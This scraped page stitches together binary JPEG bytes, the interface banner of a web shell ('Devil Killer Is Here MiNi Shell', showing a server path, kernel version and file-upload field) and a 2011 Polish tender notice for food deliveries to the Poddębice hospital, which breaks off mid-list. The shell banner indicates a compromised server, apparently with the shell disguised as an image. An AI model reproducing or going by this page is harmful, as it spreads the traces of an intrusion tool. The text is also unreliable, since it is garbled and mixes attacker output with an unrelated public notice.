JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110224/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110224/64527-N-2011.html

<p class="kh_header"><b>Poddębice: Dostawa produktów żywnościowych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Poddębicach</b><br>
<b>Numer ogłoszenia: 64527 - 2011; data zamieszczenia: 24.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Poddębicach , ul. Mickiewicza 16, 99-200 Poddębice, woj. łódzkie, tel. 043 678 36 22, faks 043 678 20 21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-poddebice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów żywnościowych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Poddębicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Przedmiotem zamówienia jest dostawa produktów żywnościowych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Poddębicach, w ilościach i asortymencie szczegółowo określonych w Załączniku nr 3 do SIWZ - Formularz cenowy. Kod CPV: 15.80.00.00-6; 15.81.10.00-6, 15.50.00.00-3; 03.22.00.00-9; 15.22.00.00-6; 15.11.00.00-2; 15.11.20.00-6; 15.13.11.30-5.
2	Oferowany towar winien spełniać warunki szczegółowo określone w Formularzu cenowym - załącznik nr 3 do SIWZ. 
3	Wykonawca będzie dostarczał towar spełniający wymagania, co do jakości, terminu przydatności do spożycia i oznakowania, określone prawem, a w szczególności: ustawy z dnia 25 sierpnia 2006r o bezpieczeństwie żywności i żywienia (Dz. U. z 2006, Nr 171, poz. 1225 z późn. zm.), ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (tekst jednolity: Dz. U. 2001 r., Nr 5 poz. 44 z późn. zm.) oraz rozporządzeniami z nimi powiązanymi.
4	Realizacja dostaw będzie się odbywać sukcesywnie na podstawie zamówień składanych przez upoważnionego pracownika Kuchni Zamawiającego za pośrednictwem faxu, za potwierdzeniem transmisji.
5	Dostawy towaru nastąpią według potrzeb Zamawiającego:
- 1 raz w tygodniu - (zamówienie złożone minimum 48h przed dostawą towarów) - dla pakietu: 1;
- 6 razy w tygodniu (od poniedziałku do soboty do godziny 7:00) - dla pakietu 2;
- 3 razy w tygodniu - zamówienie złożone minimum 24 h przed dostawą - dla Pakietu nr 3, 4, 5, 6, 7, 8;
6	Realizacja dostaw będzie odbywać się w godzinach 7:00-14:00 lub innych uzgodnionych każdorazowo z upoważnionym pracownikiem Kuchni Zamawiającego, a w przypadku pakietów 2 i 3 do godziny 7:00 oraz pakietów 6, 7, 8 do godziny 8:00.
7	Dostawa przedmiotu umowy odbywać się będzie na koszt i ryzyko Wykonawcy do Kuchni Zamawiającego mieszczącej się w siedzibie Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Poddębicach, przy ulicy Mickiewicza 16. Wykonawca zobowiązany jest do złożenia zamówionego towaru w miejscu wskazanym przez pracownika Kuchni Zamawiającego.
8	Faktyczna ilość zamawianych produktów żywnościowych zależna będzie od rzeczywistych potrzeb Zamawiającego. Określone przez Zamawiającego w Załączniku nr 3 do SIWZ (stanowiącym załącznik nr 1 do umowy) ilości produktów żywnościowych nie stanowią zobowiązania Zamawiającego do ich zakupienia u Wykonawcy i nie mogą być podstawą żadnych roszczeń ze strony Wykonawcy.
9	Wykonawca jest zobowiązany dostarczać produkty oznaczone w pakietach odpowiadające normom kontroli jakości w obowiązującym systemie GHP, GMP, HACCP. Przedmiot zamówienia musi być dostarczany: w najlepszym gatunku, zgodnie z obowiązującymi normami, wolny od zapachów obcych i zanieczyszczeń oraz szkodników, nieuszkodzony, zawsze świeży i zgodny z terminem ważności.
10	Dostawa przedmiotu zamówienia odbywać się będzie w odpowiednich opakowaniach (zamkniętych i nieuszkodzonych), transportem zapewniającym należyte zabezpieczenie przed czynnikami zewnętrznymi i przystosowanym do przewozu żywności - zgodnie z obowiązującymi przepisami.
11	Produkty muszą być odpowiednio oznakowane, posiadać datę minimalnej trwałości.
12	Ewentualne reklamacje dostaw z tytułu jakości lub ilości dostarczonego towaru składane będą Wykonawcy za pośrednictwem faxu, za potwierdzeniem transmisji niezwłocznie po ich stwierdzeniu przez Zamawiającego.
13	Wykonawca jest zobowiązany do udzielenia odpowiedzi na złożoną reklamację w ciągu 24 h od chwili złożenia reklamacji, a w przypadku braku odpowiedzi reklamację uważać się będzie w całości uznaną przez Wykonawcę.
14	W przypadku uznania reklamacji za zasadną Wykonawca zobowiązany jest w terminie 48 h od chwili uznania reklamacji wymienić towar na wolny od wad bądź uzupełnić braki ilościowe na własny koszt i we własnym zakresie.
15	W przypadku braku realizacji zamówienia w terminach określonych w pkt. 5  niniejszego rozdziału, a także w przypadku uchybienia terminowi, o którym mowa w pkt. 14 niniejszego rozdziału - Zamawiający ma prawo dokonać zakupu przedmiotu zamówienia we własnym zakresie i obciążyć Wykonawcę wszelkimi kosztami poniesionymi z tego tytułu oraz naliczyć kary umowne określone w § 6 ust.1 ppkt. 1.2 i 1.4. wzoru umowy - Załącznik nr 2 do SIWZ.
16	Zamawiający dopuszcza możliwość zamieszczenia przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SIWZ) i Formularzu cenowym (Załącznik Nr 3 do SIWZ) tylko tych pakietów na które składa ofertę. 
17	Zamawiający zastrzega sobie stałość cen przez okres obowiązywania umowy za wyjątkiem zmian stawki podatku VAT, które to obowiązują z chwilą wprowadzenia ich stosowanymi przepisami.
18	Zamawiający przewiduje możliwość wprowadzenia zmiany w umowie w przypadku zaprzestania produkcji którejkolwiek z części asortymentu będącego przedmiotem umowy, wówczas Wykonawca zobowiązuje się do niezwłocznego potwierdzenia stosownym dokumentem zaprzestania wytwarzania produktu oraz do przedstawienia Zamawiającemu propozycji zamiennika takiego wyrobu o parametrach nie gorszych niż zaoferowane w przetargu w cenie zaoferowanej za przedmiot umowy w przetargu lub cenie korzystniejszej dla Zamawiającego niż w przetargu. Zmiana umowy w tym zakresie nastąpi po pisemnym zaakceptowaniu przez Zamawiającego propozycji zamiennika.
19	Dopuszcza się zmiany umowy polegające na obniżeniu ceny jednostkowej towaru..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.81.10.00-6, 15.50.00.00-3, 03.22.00.00-9, 15.22.00.00-6, 15.11.00.00-2, 15.11.20.00-6, 15.13.11.30-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek Wykonawca spełnił jeżeli Wykonawca złoży oświadczenie, którego treść stanowi załącznik nr 4 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony przez Wykonawcę dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek Wykonawca spełnił  jeżeli Wykonawca złoży oświadczenie, którego treść stanowi załącznik nr 4 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony przez Wykonawcę dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek Wykonawca spełnił  jeżeli Wykonawca złoży oświadczenie, którego treść stanowi załącznik nr 4 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony przez Wykonawcę dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek Wykonawca spełnił  jeżeli Wykonawca złoży oświadczenie, którego treść stanowi załącznik nr 4 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony przez Wykonawcę dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek Wykonawca spełnił  jeżeli Wykonawca złoży oświadczenie, którego treść stanowi załącznik nr 4 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony przez Wykonawcę dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość wprowadzenia zmiany w umowie w przypadku zaprzestania produkcji którejkolwiek z części asortymentu będącego przedmiotem umowy, wówczas Wykonawca zobowiązuje się do niezwłocznego potwierdzenia stosownym dokumentem zaprzestania wytwarzania produktu oraz do przedstawienia Zamawiającemu propozycji zamiennika takiego wyrobu o parametrach nie gorszych niż zaoferowane w przetargu w cenie zaoferowanej za przedmiot umowy w przetargu lub cenie korzystniejszej dla Zamawiającego niż w przetargu. Zmiana umowy w tym zakresie nastąpi po pisemnym zaakceptowaniu przez Zamawiającego propozycji zamiennika. 
2.	Dopuszcza się zmiany umowy polegające na obniżeniu ceny jednostkowej towaru. 
3.	Dopuszcza się zmiany stawki podatku VAT, które to obowiązują z chwilą wprowadzenia ich stosowanymi przepisami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-poddebice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Poddębicach
99-200 Poddębice ul. Mickiewicza 16 Sekretariat Dyrekcji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2011 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Poddębicach
99-200 Poddębice ul. Mickiewicza 16 Sekretariat Dyrekcji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1 - PRODUKTY SPOŻYWCZE..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cukier 1kg,	kg 1300;
2. Sól jodowana 1kg, kg	320;
3. Mąka, 1kg typ 450,	kg 1100;
4. Kleik ryżowy 170g ,szt.	200;
5. Suchary b/c 220 - 300 g,	szt.	120;
6. Przyprawa warzywna 200g,	szt.	400;
7. Przyprawa do kurczaka 100g, szt.	60;
8. Przyprawa do gulaszu 20 g	, szt.	20;
9. Przyprawa do zup w płynie	1L, szt.	30;
10. Olej rzepakowy	1L szt.	450;
11. Herbata 100g,	szt.	740;
12. Papryka mielona słodka 20g, szt.	20;
13. Kakao ciemne	100g, szt.	10;
14. Chrupki kukurydziane 70g, szt. 300;
15. Chleb ryżowy	130g, szt.	150;
16. Bułka tarta, kg	50;
17. Ryż sypki 1kg, kg	260;
18. Kasza manna 1kg, kg 200;
19. Kasza jęczmienna 1kg, kg 300;
20. Kwasek cytrynowy	20g, szt.	820;
21. Makaron świderki, kg	400;
22. Jaja L 60-65, szt.	7500;
23. Makaron krajanka, kg	200;
24. Makaron nitka, kg	100;
25. Zacierka makaronowa, kg	150;
26. Majeranek	15g, szt.	50;
27. Liść laurowy	10g, szt.	40;
28. Ziele angielskie	15g, szt.	40;
29. Barszcz biały w płynie	0,5L, szt.	150;
30. Pieprz mielony	15g, szt.	170;
31. Musztarda	200g, szt.	10;
32. Dżem	25g, szt.	4000;
33. Miód naturalny wielokwiatowy	25g, szt.	50;
34. Kisiel	40g (truskawka, cytryna),	szt.	700;
35. Galaretka	90g (truskawka, morela),	szt.	400;
36. Budyń śmietankowy (? 1 mleka)	40g,	szt.	200;
37. Herbatniki	14-20 g,	szt.	1000;
38. Aronia - koncentrat w proszku	100g,	szt.	600;
39. Ciastka	Bez czekolady,	kg	20;
40. Chrzan	190g,	szt.	10;
41. Soda oczyszczona	80g,	szt.	530;
42. Drożdże	100g,	szt.	40;
43. Ocet	0,5L,	szt.	10;
44. Wafelki Bez czekolady 20 g, szt.	1000;
45. Sok owocowo-warzywny b/cukru (środek spożywczy specjalnego przeznaczenia )	175ml,	szt.	250;
46. Koncentrat pomidorowy 30%	0,9L,	szt.	150;
47. Koncentrat pomidorowy	70g,	szt.	100;
48. Majonez	700 g,	szt.	30;
49. Groszek konserwowy	400g,	szt.	80;
50. Szczaw konserwowy	0,9 L,	szt.	40;
51. Barszcz czerwony-koncentrat (w płynie)	320-380 ml, szt.	50;
52. Kukurydza	400g,	szt.	20;
53. Pasztet drobiowy	130g,	szt.	450;
54. Mąka ziemniaczana, kg	5;
55. Deser owocowy	130g,	szt.	120;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2 - PIECZYWO..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Chleb pszenno-żytni	1200g,	szt.	3 500;
2. Chleb razowy	600g,	szt.	2100;
3. Bułka zwykła	50g,	szt.	35000;
4. Bułka słodka	100g,	szt.	100;
5. Pączek	100g,	szt.	100;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR 3 - MLEKO I NABIAŁ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Mleko	2% -1L,	szt.	6800;
2. Masło roślinne kostka (mix)	200-250g, 	szt.	3000;
3. Śmietana 18% 400 g,	szt.	400;
4. Ser biały półtłusty, kg	500;
5. Ser żółty - twardy Salami, Morski lub równoważny, kg	100;
6. Ser topiony-plastry 130g,	szt.	1200;
7. Ser topiony- krążek 140g,	szt.	800;
8. Ser z twarogu i śmietany (Ser kiri lub równoważny) 100g Śmietankowy, szt.	300;
9. Margaryna 250g,	szt.	250;
10. Jogurt naturalny b/c	135g,	szt.	1500;
11. Jogurt owocowy	120g,	szt.	2000;
12. Kefir	1L,	szt.	20;
13. Mleko w kartonie 2%	1 L,	szt.	20;
14. Serek homogenizowany	120g,	szt.	100;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR 4 - ZIEMINIAKI, WARZYWA, OWOCE, KISZONKI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ziemniaki, kg	11000;
2. Marchew, kg	2500;
3. Pietruszka, kg	40;
4. Seler, kg	700;
5. Por, szt.	50;
6. Burak, Kg	1500;
7. Botwina	w sezonie, szt.	50;
8. Kapusta biała, kg	650;
9. Kapusta młoda	w sezonie, szt.	200;
10. Kapusta pekińska, kg	200;
11. Kapusta czerwona, Kg	50;
12. Włoszczyzna	Pęczek,	szt.	1000;
13. Cebula biała, kg	200;
14. Pieczarka, kg	50;
15. Jabłka średniej wielkości, kg	3000;
16. Ogórek zielony	w sezonie, kg	50;
17. Ogórek kwaszony, kg	80;
18. Pomidory w sezonie, kg	70;
19. Koperek	Pęczek,	szt.	450;
20. Natka pietruszki	 Pęczek,	szt.	750;
21. Kalafior	w sezonie,	szt.	200;
22. Brokuły	w sezonie,	szt.	50;
23. Sałata siewna, szt.	800;
24. Fasolka szparagowa	w sezonie,	kg	50;
25. Brukselka	w sezonie,	kg	20;
26. Groch łupany, kg	10;
27. Kapusta kiszona	, kg	200;
28. Czosnek, szt.	20;
29. Papryka, kg	10;
30. Szczypior, szt.	50;
31. Truskawka	w sezonie,	kg	20;
32. Czarna porzeczka	w sezonie,	kg	20;
33. Banany, kg	30;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR 5 - RYBY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Filet z ryby mrożony (mintaj), kg	200;
2. Śledzie solone, kg	30;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR 6 - MIĘSA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wieprzowina gulaszowa, kg	1000;
2. Wołowina gulaszowa, kg	250;
3. Wieprzowina tłusta, kg	250;
4. Kości rozbiorowe, kg	450;
5. Schab b /k, kg	500;
6. Żeberka, kg	50;
7. Słonina, kg	40;
8. Wątroba wieprzowa, kg	120;
9. Karczek b/k, kg	250;
